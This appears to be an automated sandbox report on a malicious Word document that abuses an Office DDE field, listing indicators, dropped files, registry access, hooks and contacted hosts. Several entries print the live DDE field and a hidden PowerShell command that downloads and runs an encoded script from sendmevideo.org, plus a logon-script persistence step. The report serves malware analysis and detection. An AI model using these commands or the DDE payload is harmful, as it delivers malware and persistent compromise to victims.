Incident Response

Risk Assessment

Stealer/Phishing
Scans for artifacts that may help identify the target
Persistence
Writes data to a remote process
Fingerprint
Reads the active computer name
Reads the cryptographic machine GUID
Reads the windows installation date
Scans for artifacts that may help identify the target
Network Behavior
Contacts 2 domains and 3 hosts.

Indicators

  • Malicious Indicators 10

  • Exploit/Shellcode
  • External Systems
  • General
    • GETs files from a webserver
      details
      "GET /dh2025e/eee.txt HTTP/1.1
      Host: sendmevideo.org
      Connection: Keep-Alive"
      "GET /dh2025e/eh.dll HTTP/1.1
      Host: sendmevideo.org
      Connection: Keep-Alive"
      source
      Network Traffic
      relevance
      10/10
  • Network Related
    • Malicious artifacts seen in the context of a contacted host
      details
      Found malicious artifacts related to "172.217.22.46" (ASN: , Owner: ): ...

      File SHA256: afa79df610608282a2da8cca3ac51047e8f108ffbab82a1d5af1585e7afec4dd (Scanned on 11/02/2017 03:36:48)
      File SHA256: 832c95211cf1468928ef9c2baedd3819823a5fee08b26c1ae476013c21013aa1 (Scanned on 11/01/2017 10:10:31)
      File SHA256: 063f6a44ef21a0070c3c9df83256888b4db458702660afe19656a83a70421f64 (Scanned on 10/31/2017 12:36:43)
      File SHA256: c572ddb5afa6a2db79a1f81f2a8f8fc09d7af892b19e2ae4d09e2edc9b0eb49c (Scanned on 10/31/2017 12:35:50)
      File SHA256: 9637efe25201e7e0d3b89d3a1af575e07520a7fe18776709d6c8fe5492a4920f (Scanned on 10/31/2017 11:56:35)
      File SHA256: 5a9c7c960f40ba72cbe5cf8f90d281fad1ea1a42dffadead60e05f0267d4da42 (AV positives: 1/64 scanned on 08/27/2017 14:18:25)
      File SHA256: 0bcfbe22f59244d81a1125678872f04dd460251a474ca612b5e982f8ddfd2cae (AV positives: 55/65 scanned on 08/12/2017 21:03:58)
      File SHA256: b7c59bc5ec3f6cc36daab5eeea97fb4bda030b69e2098c52636a130a509a92e1 (AV positives: 55/65 scanned on 08/12/2017 20:12:58)
      File SHA256: 51639dec03d97949ee1bd4653719224ff544177820f9982251688f40e972b58a (AV positives: 54/64 scanned on 08/12/2017 20:09:28)
      File SHA256: 8de2e53da7cfdbfb3e32a54be4ed74df629c12804bfa161d188ce211d5e1b094 (AV positives: 55/65 scanned on 08/12/2017 19:59:27)
      source
      Network Traffic
      relevance
      10/10
  • Pattern Matching
    • YARA signature match
      details
      YARA signature "Office_DDE_field" classified file "759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx.bin" as "dde,exploit" based on indicators: "<w:fldChar w:fldCharType="begin"/></w:r><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:bookmarkEnd w:id="0"/><w:r w:rsidR="005C4A94"><w:instrText xml:space="preserve">DDE "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://sendmevideo.org/dh2025e/eee.txt');powershell -enc $e # " "a slow internet connection" "try again later"</w:instrText></w:r><w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:rPr><w:b/><w:noProof/></w:rPr><w:t> </w:t></w:r><w:r><w:fldChar w:fldCharType="end"/>"
      source
      YARA Signature
      relevance
      10/10
  • Unusual Characteristics
  • Suspicious Indicators 15

  • Anti-Reverse Engineering
    • Uses powershell with an encoded commandline
      details
      Process "powershell.exe" with commandline "C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://sendmevideo.org/dh2025e/eee.txt');powershell -enc $e # .EXE a" (UID: 00040140-00002460, Additional Context: "System.Net.WebClient.DownlodString('http://sendmevideo.org/dh2025e/eee.txt');powershell;"), Process "powershell.exe" with commandline "-enc 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" (UID: 00040970-00001420, Additional Context: "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}if (Test-Path $p){ $rd_p='%WINDIR%\+"\System32\rundll32.exe"New-ItemProperty -Path 'HKCU:\Environment' -Name 'UserInitMprLogonScript' -Value "$p_bat" -PropertyType String -Force | Out-Null;")
      source
      Monitored Target
      relevance
      10/10
  • Environment Awareness
    • Reads the cryptographic machine GUID
      details
      "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
      "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
      source
      Registry Access
      relevance
      10/10
    • Reads the windows installation date
      details
      "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION"; Key: "INSTALLDATE")
      source
      Registry Access
      relevance
      10/10
  • External Systems
    • Detected Emerging Threats Alert
      details
      Detected alert "ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download" (SID: 2016538, Rev: 3, Severity: 2) categorized as "Potentially Bad Traffic"
      source
      Suricata Alerts
      relevance
      10/10
  • General
    • Opened the service control manager
      details
      "powershell.exe" called "OpenSCManager" requesting access rights "0X0"
      "powershell.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
      "powershell.exe" called "OpenSCManager" requesting access rights "0X80000000L"
      "rundll32.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
      "rundll32.exe" called "OpenSCManager" requesting access rights "0XE0000000L"
      source
      API Call
      relevance
      10/10
    • Requested access to a system service
      details
      "powershell.exe" called "OpenService" to access the "RASMAN" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
      "powershell.exe" called "OpenService" to access the "RASMAN" service
      "powershell.exe" called "OpenService" to access the "rasman" service
      "rundll32.exe" called "OpenService" to access the "ServicesActive" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
      "rundll32.exe" called "OpenService" to access the "gpsvc" service
      "rundll32.exe" called "OpenService" to access the "rasman" service
      "rundll32.exe" called "OpenService" to access the "RASMAN" service
      "rundll32.exe" called "OpenService" to access the "Sens" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
      "rundll32.exe" called "OpenService" to access the "CryptSvc" service
      "rundll32.exe" called "OpenService" to access the "cryptsvc" service
      "rundll32.exe" called "OpenService" to access the "" service
      source
      API Call
      relevance
      10/10
    • Sent a control code to a service
      details
      "rundll32.exe" called "ControlService" and sent control code "0X24" to the service "gpsvc"
      "rundll32.exe" called "ControlService" and sent control code "0XFC" to the service "gpsvc"
      "rundll32.exe" called "ControlService" and sent control code "0X400" to the service "CryptSvc"
      "rundll32.exe" called "ControlService" and sent control code "0X24" to the service "cryptsvc"
      source
      API Call
      relevance
      10/10
  • Installation/Persistence
    • Drops executable files
      details
      "mvdrt.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
      "carved_0.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
      source
      Extracted File
      relevance
      10/10
    • Writes data to a remote process
      details
      "WINWORD.EXE" wrote 32 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 284)
      "WINWORD.EXE" wrote 52 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 284)
      "WINWORD.EXE" wrote 4 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 284)
      source
      API Call
      relevance
      6/10
  • Spyware/Information Retrieval
  • System Security
    • Modifies proxy settings
      details
      "powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
      "powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
      source
      Registry Access
      relevance
      10/10
    • Queries sensitive IE security settings
      details
      "WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
      "powershell.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
      "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
      source
      Registry Access
      relevance
      8/10
  • Unusual Characteristics
    • Drops cabinet archive files
      details
      "Cab955E.tmp" has type "Microsoft Cabinet archive data 53978 bytes 1 file"
      "Cab7CC9.tmp" has type "Microsoft Cabinet archive data 50939 bytes 1 file"
      "94308059B57B3142E455B38A6EB92015" has type "Microsoft Cabinet archive data 53978 bytes 1 file"
      "Cab9118.tmp" has type "Microsoft Cabinet archive data 50939 bytes 1 file"
      source
      Extracted File
      relevance
      10/10
    • Installs hooks/patches the running process
      details
      "WINWORD.EXE" wrote bytes "82c90ff0" to virtual address "0x6D1CCA70" (part of module "GFX.DLL")
      "WINWORD.EXE" wrote bytes "e92399e5ed" to virtual address "0x765A5DEE" ("VariantChangeType@OLEAUT32.DLL")
      "WINWORD.EXE" wrote bytes "e9c5328fee" to virtual address "0x76086143" ("OleLoadFromStream@OLE32.DLL")
      "WINWORD.EXE" wrote bytes "29fd0ff0" to virtual address "0x655F78E4" (part of module "OART.DLL")
      "WINWORD.EXE" wrote bytes "e96033e3ed" to virtual address "0x765A4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
      "WINWORD.EXE" wrote bytes "ef3663f1" to virtual address "0x6C199904" (part of module "RICHED20.DLL")
      "WINWORD.EXE" wrote bytes "fe8e6af1" to virtual address "0x6C2A10AC" (part of module "MSPTLS.DLL")
      "WINWORD.EXE" wrote bytes "49230cf0" to virtual address "0x66AFF530" (part of module "WWLIB.DLL")
      "WINWORD.EXE" wrote bytes "7573bef1" to virtual address "0x645F0BA8" (part of module "MSO.DLL")
      "WINWORD.EXE" wrote bytes "c4ca677680bb6776aa6e68769fbb677608bb677646ce677661386876de2f6876d0d96776000000001779a7754f91a7757f6fa775f4f7a77511f7a775f283a775857ea77500000000" to virtual address "0x6E0C1000" (part of module "MSIMG32.DLL")
      "WINWORD.EXE" wrote bytes "e99a54e2ed" to virtual address "0x765A3E59" ("SysFreeString@OLEAUT32.DLL")
      "WINWORD.EXE" wrote bytes "dee6cfc9" to virtual address "0x6DB642C4" (part of module "MSPROOF7.DLL")
      "WINWORD.EXE" wrote bytes "e99e48d1ed" to virtual address "0x76683D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
      "WINWORD.EXE" wrote bytes "e93655e3ed" to virtual address "0x765A3EAE" ("VariantClear@OLEAUT32.DLL")
      "WINWORD.EXE" wrote bytes "64e640f1" to virtual address "0x2FF71B94" (part of module "WINWORD.EXE")
      "powershell.exe" wrote bytes "08578776047890760000000051c1747694987476ee9c747675dc7676273e7676efb27a760000000046ce6776013d687638ed6876cfcd677631236776de2f6876c4ca677680bb6776aa6e68769fbb677692bb677646ba67760abf677600000000" to virtual address "0x73C91000" (part of module "SHFOLDER.DLL")
      "powershell.exe" wrote bytes "6cb1e0b8" to virtual address "0x68EF1FDC" (part of module "MSCORWKS.DLL")
      "powershell.exe" wrote bytes "7739597779a85d77be725d77d62d5d771de2587705a25d77c8685c7757d16377bee35877616f5d7768415b7700505b7700000000ad376e778b2d6e77b6416e7700000000" to virtual address "0x75121000" (part of module "WSHIP6.DLL")
      "powershell.exe" wrote bytes "92e6587779a85d77be725d77d62d5d771de2587705a25d77bee35877616f5d7768415b7700505b7700000000ad376e778b2d6e77b6416e7700000000" to virtual address "0x74C31000" (part of module "WSHTCPIP.DLL")
      "powershell.exe" wrote bytes "40535b7758585c77186a5c77653c5d770000000000bf67760000000056cc6776000000007cca677600000000376898756a2c5d77d62d5d7700000000206998750000000029a6677600000000a48d987500000000f70e677600000000" to virtual address "0x776D1000" (part of module "NSI.DLL")
      source
      Hook Detection
      relevance
      10/10
  • Informative 21

  • Environment Awareness
    • Reads the registry for installed applications
      details
      "WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WINWORD.EXE")
      "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WINWORD.EXE")
      "powershell.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\RUNDLL32.EXE")
      "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\RUNDLL32.EXE")
      source
      Registry Access
      relevance
      10/10
  • External Systems
    • Detected Emerging Threats Alert
      details
      Detected alert "ET INFO Packed Executable Download" (SID: 2014819, Rev: 3, Severity: 3) categorized as "Misc activity"
      source
      Suricata Alerts
      relevance
      10/10
  • General
    • Accesses Software Policy Settings
      details
      "rundll32.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
      "rundll32.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
      "rundll32.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
      "rundll32.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
      "rundll32.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
      "rundll32.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
      "rundll32.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
      "rundll32.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT"; Key: "")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES"; Key: "")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS"; Key: "")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS"; Key: "")
      source
      Registry Access
      relevance
      10/10
    • Accesses System Certificates Settings
      details
      "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\MY"; Key: "")
      "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
      "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
      "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\27AC9369FAF25207BB2627CEFACCBE4EF9C319B8"; Key: "BLOB")
      "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\8AD5C9987E6F190BD6F5416E2DE44CCD641D8CDA"; Key: "BLOB")
      "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\FF67367C5CD4DE4AE18BCCE1D70FDABD7C866135"; Key: "BLOB")
      "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
      "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\109F1CAED645BB78B3EA2B94C0697C740733031C"; Key: "BLOB")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\D559A586669B08F46A30A133F8A9ED3D038E2EA8"; Key: "BLOB")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\FEE449EE0E3965A5246F000E87FDE2A065FD89D4"; Key: "BLOB")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS\A377D1B1C0538833035211F4083D00FECC414DAB"; Key: "BLOB")
      "rundll32.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
      "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
      source
      Registry Access
      relevance
      10/10
    • Contacts domains
      details
      "sendmevideo.org"
      "satellitedeluxpanorama.com"
      source
      Network Traffic
      relevance
      1/10
    • Contacts server
      details
      "86.106.93.113:80"
      "172.217.22.46:443"
      "89.34.111.160:443"
      source
      Network Traffic
      relevance
      1/10
    • Creates mutants
      details
      "\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-59428"
      "\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
      "\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-59428"
      "\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
      "\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
      "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
      "\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
      "\Sessions\1\BaseNamedObjects\Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
      "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
      "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
      "Local\ZonesCounterMutex"
      "Local\ZoneAttributeCacheCounterMutex"
      "Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
      "Local\10MU_ACB10_S-1-5-5-0-59428"
      "Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
      "Local\ZonesLockedCacheCounterMutex"
      "Local\10MU_ACBPIDS_S-1-5-5-0-59428"
      "Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
      "Global\552FFA80-3393-423d-8671-7BA046BB5906"
      "Local\ZonesCacheCounterMutex"
      source
      Created Mutant
      relevance
      3/10
    • Loads rich edit control libraries
      details
      "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 6C150000
      source
      Loaded Module
    • Loads the .NET runtime environment
      details
      "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\d40b99d82652dbbc000d378a824ae296\mscorlib.ni.dll" at 5F360000
      source
      Loaded Module
    • Process launched with changed environment
      details
      Process "powershell.exe" was launched with new environment variables: "WecVersionForRosebud.F9C="4""
      Process "powershell.exe" was launched with modified environment variables: "PSModulePath"
      source
      Monitored Target
      relevance
      10/10
    • Reads Windows Trust Settings
      details
      "rundll32.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINTRUST\TRUST PROVIDERS\SOFTWARE PUBLISHING"; Key: "STATE")
      source
      Registry Access
      relevance
      5/10
    • Scanning for window names
      details
      "WINWORD.EXE" searching for class "MSOBALLOON"
      "WINWORD.EXE" searching for class "MsoHelp10"
      "WINWORD.EXE" searching for class "AgentAnim"
      "WINWORD.EXE" searching for class "mspim_wnd32"
      source
      API Call
      relevance
      10/10
    • Spawns new processes
      details
      Spawned process "powershell.exe" with commandline "C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://sendmevideo.org/dh2025e/eee.txt');powershell -enc $e # .EXE a" (UID: 00040140-00002460, Additional Context: "System.Net.WebClient.DownlodString('http://sendmevideo.org/dh2025e/eee.txt');powershell;"), Spawned process "powershell.exe" with commandline "-enc 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" (UID: 00040970-00001420, Additional Context: "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}if (Test-Path $p){ $rd_p='%WINDIR%\+"\System32\rundll32.exe"New-ItemProperty -Path 'HKCU:\Environment' -Name 'UserInitMprLogonScript' -Value "$p_bat" -PropertyType String -Force | Out-Null;"), Spawned process "rundll32.exe" with commandline "%ALLUSERSPROFILE%\mvdrt.dll #1"
      source
      Monitored Target
      relevance
      3/10
  • Installation/Persistence
    • Creates new processes
      details
      "WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe", Handle: 284)
      source
      API Call
      relevance
      8/10
    • Dropped files
      details
      "mvdrt.bat" has type "ASCII text with CRLF line terminators"
      "~$9fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx" has type "data"
      "759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Thu Nov 2 13:08:22 2017 mtime=Thu Nov 2 17:47:17 2017 atime=Thu Nov 2 17:47:18 2017 length=13185 window=hide"
      "mvdrt.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
      "carved_0.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
      "Tar9119.tmp" has type "data"
      "TLSMSL[1].txt" has type "ASCII text with no line terminators"
      "index.dat" has type "data"
      "wY6U6e[1].txt" has type "ASCII text with no line terminators"
      "Kn[1].txt" has type "ASCII text with no line terminators"
      "~WRS{3147DD3C-8AE0-4C18-B784-2B1DFD761C56}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
      "Cab955E.tmp" has type "Microsoft Cabinet archive data 53978 bytes 1 file"
      "Tar7CCA.tmp" has type "data"
      "IBG0sw[1].txt" has type "ASCII text with no line terminators"
      "94308059B57B3142E455B38A6EB92015" has type "data"
      "Tar955F.tmp" has type "data"
      "~WRD0000.tmp" has type "Microsoft Word 2007+"
      "6XYB45E3V9BXA69467UK.temp" has type "data"
      "~WRD0002.tmp" has type "Microsoft Word 2007+"
      "j[1].txt" has type "ASCII text with no line terminators"
      source
      Extracted File
      relevance
      3/10
    • Opens the MountPointManager (often used to detect additional infection locations)
      details
      "WINWORD.EXE" opened "\Device\MountPointManager"
      source
      API Call
      relevance
      5/10
    • Touches files in the Windows directory
      details
      "WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
      "WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
      "WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
      "WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
      "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
      "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
      "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
      "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
      "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
      "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
      "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
      "WINWORD.EXE" touched file "C:\Windows\System32\en-US\setupapi.dll.mui"
      "WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
      "WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
      "WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
      "WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
      "WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
      "WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
      source
      API Call
      relevance
      7/10
  • Network Related
    • Found potential URL in binary/memory
      details
      Pattern match: "http://sendmevideo.org/dh2025e/eee.txt"
      Heuristic match: "google.com"
      Heuristic match: "*.google.com"
      Heuristic match: "*.android.com"
      Heuristic match: "*.appengine.google.com"
      Heuristic match: "*.cloud.google.com"
      Heuristic match: "*.db833953.google.cn"
      Heuristic match: "*.gcp.gvt2.com"
      Heuristic match: "*.google-analytics.com"
      Heuristic match: "*.google.ca"
      Heuristic match: "*.google.cl"
      Heuristic match: "*.google.co.in"
      Heuristic match: "*.google.co.jp"
      Heuristic match: "*.google.co.uk"
      Heuristic match: "*.google.com.ar"
      Heuristic match: "*.google.com.au"
      Heuristic match: "*.google.com.br"
      Heuristic match: "*.google.com.co"
      Heuristic match: "*.google.com.mx"
      Heuristic match: "*.google.com.tr"
      Heuristic match: "*.google.com.vn"
      Heuristic match: "*.google.de"
      Heuristic match: "*.google.es"
      Heuristic match: "*.google.fr"
      Heuristic match: "*.google.hu"
      Heuristic match: "*.google.it"
      Heuristic match: "*.google.nl"
      Heuristic match: "*.google.pl"
      Heuristic match: "*.google.pt"
      Heuristic match: "*.googleadapis.com"
      Heuristic match: "*.googleapis.cn"
      Heuristic match: "*.googlecommerce.com"
      Heuristic match: "*.googlevideo.com"
      Heuristic match: "*.gstatic.cn"
      Heuristic match: "*.gstatic.com"
      Heuristic match: "*.gvt1.com"
      Heuristic match: "*.gvt2.com"
      Heuristic match: "*.metric.gstatic.com"
      Heuristic match: "*.urchin.com"
      Heuristic match: "*.url.google.com"
      Heuristic match: "*.youtube-nocookie.com"
      Heuristic match: "*.youtube.com"
      Heuristic match: "*.youtubeeducation.com"
      Heuristic match: "*.ytimg.com"
      Heuristic match: "android.clients.google.com"
      Heuristic match: "android.com"
      Heuristic match: "developer.android.google.cn"
      Heuristic match: "developers.android.google.cn"
      Heuristic match: "google-analytics.com"
      Heuristic match: "googlecommerce.com"
      Heuristic match: "source.android.google.cn"
      Pattern match: "www.goo.gl"
      Heuristic match: "youtube.com"
      Heuristic match: "youtubeeducation.com"
      Pattern match: "http://pki.google.com/GIAG2.crt0+"
      Pattern match: "http://clients1.google.com/ocsp0"
      Pattern match: "http://pki.google.com/GIAG2.crl0"
      Pattern match: "http://g.symcd.com0"
      Pattern match: "http://g.symcb.com/crls/gtglobal.crl0"
      Pattern match: "http://crl.geotrust.com/crls/secureca.crl0N"
      Pattern match: "https://www.geotrust.com/resources/repository0"
      Heuristic match: "satellitedeluxpanorama.com"
      Pattern match: "www.download.windowsupdate.com"
      Heuristic match: "sendmevideo.org"
      source
      String
      relevance
      10/10
  • Spyware/Information Retrieval
    • Found a reference to a known community page
      details
      "*.youtube-nocookie.com" (Indicator: "youtube")
      "*.youtube.com" (Indicator: "youtube")
      "*.youtubeeducation.com" (Indicator: "youtube")
      "youtube.com" (Indicator: "youtube")
      "youtubeeducation.com" (Indicator: "youtube")
      source
      String
      relevance
      7/10
  • System Security
    • Hooks API calls
      details
      "VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
